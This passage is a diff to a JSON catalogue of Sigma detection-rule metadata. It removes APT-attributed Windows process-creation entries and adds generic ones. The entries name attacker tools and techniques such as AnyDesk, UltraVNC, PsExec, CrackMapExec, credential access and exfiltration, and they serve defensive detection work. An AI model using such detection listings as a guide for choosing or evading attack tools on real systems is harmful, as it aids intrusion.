- "attack.t1219"
- ]
- },
- "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9",
- "value": "AnyDesk Silent Installation"
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/05/20",
- "falsepositive": [
- "Legitimate use of AnyDesk from a non-standard folder"
- ],
- "filename": "proc_creation_win_anydesk_susp_folder.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ]
- },
- "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86",
- "value": "Use of Anydesk Remote Access Software from Suspicious Folder"
- },
- {
- "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.",
- "meta": {
- "author": "Andreas Hunkeler (@Karneades)",
- "creation_date": "2022/02/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_actinium_persistence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.t1053.005"
- ]
- },
- "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602",
- "value": "Scheduled Task WScript VBScript"
- },
- {
- "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. 
think tanks.",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2018/12/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_apt29_thinktanks.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/",
- "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0016",
- "attack.t1059.001"
- ]
- },
- "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f",
- "value": "APT29"
- },
- {
- "description": "Detects activity that could be related to Baby Shark malware",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/02/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_babyshark.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.discovery",
- "attack.t1012",
- "attack.defense_evasion",
- "attack.t1218.005"
- ]
- },
- "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35",
- "value": "Baby Shark Activity"
- },
- {
- "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": 
"proc_creation_win_apt_bear_activity_gtr19.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.001",
- "attack.t1003.003"
- ]
- },
- "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee",
- "value": "Judgement Panda Credential Access Activity"
- },
- {
- "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report",
- "meta": {
- "author": "Florian Roth, Tim Shelton",
- "creation_date": "2019/10/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_bluemashroom.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0",
- "value": "BlueMashroom DLL Load"
- },
- {
- "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018",
- "meta": {
- "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_chafer_mar18.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06",
- "value": "Chafer Activity"
- },
- {
- "description": "Detects wmiexec vbs version execution by wscript or cscript",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2017/04/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_cloudhopper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0045",
- "attack.t1059.005"
- ]
- },
- "uuid": "966e4016-627f-44f7-8341-f394905c361f",
- "value": "WMIExec VBS Script"
- },
- {
- "description": "Detects CrackMapExecWin Activity as Described by NCSC",
- "meta": {
- "author": "Markus Neis",
- "creation_date": "2018/04/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_dragonfly.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control",
- "https://attack.mitre.org/software/S0488/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml"
- ],
- "tags": [
- "attack.g0035",
- "attack.credential_access",
- "attack.discovery",
- "attack.t1110",
- "attack.t1087"
- ]
- },
- "uuid": 
"04d9079e-3905-4b70-ad37-6bdf11304965",
- "value": "CrackMapExecWin"
- },
- {
- "description": "Detects Elise backdoor acitivty as used by APT32",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2018/01/31",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_elise.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml"
- ],
- "tags": [
- "attack.g0030",
- "attack.g0050",
- "attack.s0081",
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f",
- "value": "Elise Backdoor"
- },
- {
- "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2018/09/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_emissarypanda_sep19.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965",
- "https://twitter.com/cyb3rops/status/1168863899531132929",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002"
- ]
- },
- "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014",
- "value": "Emissary Panda Malware SLLauncher"
- },
- {
- "description": "Detects EmpireMonkey APT reported Activity",
- "meta": {
- "author": "Markus Neis",
- "creation_date": "2019/04/02",
- "falsepositive": [
- "Very Unlikely"
- ],
- "filename": "proc_creation_win_apt_empiremonkey.yml",
- "level": "critical",
- "logsource.category": "process_creation", 
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d",
- "value": "Empire Monkey"
- },
- {
- "description": "Detects a specific tool and export used by EquationGroup",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=",
- "https://securelist.com/apt-slingshot/84312/",
- "https://twitter.com/cyb3rops/status/972186477512839170",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml"
- ],
- "tags": [
- "attack.g0020",
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e",
- "value": "Equation Group DLL_U Load"
- },
- {
- "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/07/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_evilnum_jul20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml"
+ 
"https://twitter.com/rikvduijn/status/853251879320662017",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml"
 ],
 "tags": [
 "attack.defense_evasion",
 "attack.t1218.011"
 ]
 },
- "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0",
- "value": "EvilNum Golden Chickens Deployment via OCX Files"
- },
- {
- "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
- "meta": {
- "author": "Tim Burrell",
- "creation_date": "2020/02/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_gallium.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1212",
- "attack.command_and_control",
- "attack.t1071"
- ]
- },
- "uuid": "18739897-21b1-41da-8ee4-5b786915a676",
- "value": "GALLIUM Artefacts"
- },
- {
- "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
- "meta": {
- "author": "Tim Burrell",
- "creation_date": "2020/02/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_gallium_sha1.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1212",
- "attack.command_and_control",
- "attack.t1071"
- ]
- },
- "uuid": "440a56bf-7873-4439-940a-1c8a671073c2",
- "value": "GALLIUM Sha1 Artefacts"
- },
- {
- "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2022/03/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.g0047",
- "attack.t1021.005"
- ]
- },
- "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599",
- "value": "Suspicious UltraVNC Execution"
- },
- {
- "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/05/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_greenbug_may20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml"
- ],
- "tags": [
- "attack.g0049",
- "attack.execution",
- 
"attack.t1059.001",
- "attack.command_and_control",
- "attack.t1105",
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "uuid": "3711eee4-a808-4849-8a14-faf733da3612",
- "value": "Greenbug Campaign Indicators"
- },
- {
- "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/03/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_hafnium.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3",
- "https://twitter.com/GadixCRK/status/1369313704869834753?s=20",
- "https://twitter.com/BleepinComputer/status/1372218235949617161",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546",
- "attack.t1053"
- ]
- },
- "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7",
- "value": "Exchange Exploitation Activity"
- },
- {
- "description": "Detects Hurricane Panda Activity",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_hurricane_panda.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.g0009",
- 
"attack.t1068"
- ]
- },
- "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7",
- "value": "Hurricane Panda Activity"
- },
- {
- "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.g0010",
- "attack.credential_access",
- "attack.t1003.001",
- "attack.exfiltration",
- "attack.t1560.001"
- ]
- },
- "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422",
- "value": "Judgement Panda Exfil Activity"
- },
- {
- "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020",
- "meta": {
- "author": "Markus Neis, Swisscom",
- "creation_date": "2020/06/18",
- "falsepositive": [
- "Will need to be looked for combinations of those processes"
- ],
- "filename": "proc_creation_win_apt_ke3chang_regadd.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml"
- ],
- "tags": [
- "attack.g0004",
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "7b544661-69fc-419f-9a59-82ccc328f205",
- "value": "Ke3chang Registry Key Modifications"
- },
- {
- 
"description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/04/20",
- "falsepositive": [
- "Should not be any false positives"
- ],
- "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml"
- ],
- "tags": [
- "attack.g0032",
- "attack.execution",
- "attack.t1106"
- ]
- },
- "uuid": "4a12fa47-c735-4032-a214-6fab5b120670",
- "value": "Lazarus Activity Apr21"
- },
- {
- "description": "Detects different process creation events as described in various threat reports on Lazarus group activity",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2020/12/23",
- "falsepositive": [
- "Overlap with legitimate process activity in some cases (especially selection 3 and 4)"
- ],
- "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml"
- ],
- "tags": [
- "attack.g0032",
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a",
- "value": "Lazarus Activity Dec20"
- },
- {
- "description": "Detects different loaders as described in various threat reports on Lazarus group activity",
- "meta": {
- "author": "Florian Roth, wagga",
- "creation_date": 
"2020/12/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_lazarus_loader.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml"
- ],
- "tags": [
- "attack.g0032",
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e",
- "value": "Lazarus Loaders"
- },
- {
- "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)",
- "meta": {
- "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2020/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_lazarus_session_highjack.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b",
- "value": "Lazarus Session Highjacker"
- },
- {
- "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/08/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_mercury.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- 
"https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.g0069"
- ]
- },
- "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d",
- "value": "MERCURY Command Line Patterns"
- },
- {
- "description": "Detecting DNS tunnel activity for Muddywater actor",
- "meta": {
- "author": "@caliskanfurkan_",
- "creation_date": "2020/06/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/",
- "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "uuid": "36222790-0d43-4fe8-86e4-674b27809543",
- "value": "DNS Tunnel Technique from MuddyWater"
- },
- {
- "description": "Detects specific process parameters as used by Mustang Panda droppers",
- "meta": {
- "author": "Florian Roth, oscd.community",
- "creation_date": "2019/10/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_mustangpanda.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
- "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
- ],
- "tags": [
- "attack.t1587.001",
- "attack.resource_development"
- ]
- },
- "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00",
- "value": "Mustang Panda Dropper"
- },
- {
- "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/07/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_revil_kaseya.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers",
- "https://www.joesandbox.com/analysis/443736/0/html",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
- "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.g0115"
- ]
- },
- "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5",
- "value": "REvil Kaseya Incident Malware Patterns"
+ "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819",
+ "value": "Suspicious Control Panel DLL Load"
 },
 {
 "description": "Detects Silence downloader. These commands are hardcoded into the binary.", 
@@ -34435,29 +28307,2658 @@ "value": "Silence.Downloader V3" }, { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "description": "Detects suspicious process related to rundll32 based on arguments", "meta": { - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "creation_date": "2019/03/04", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/01/16", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_apt_slingshot.yml", + "filename": "proc_creation_win_susp_rundll32_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://twitter.com/Hexacorn/status/885258886428725250", + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "value": "Suspicious Rundll32 Activity" + }, + { + "description": "Detects a PsExec service start", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_psexesvc_start.yml", + "level": "low", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ] + }, + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start" + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dir.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution" + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + "falsepositive": [ + "Administrative scripts." 
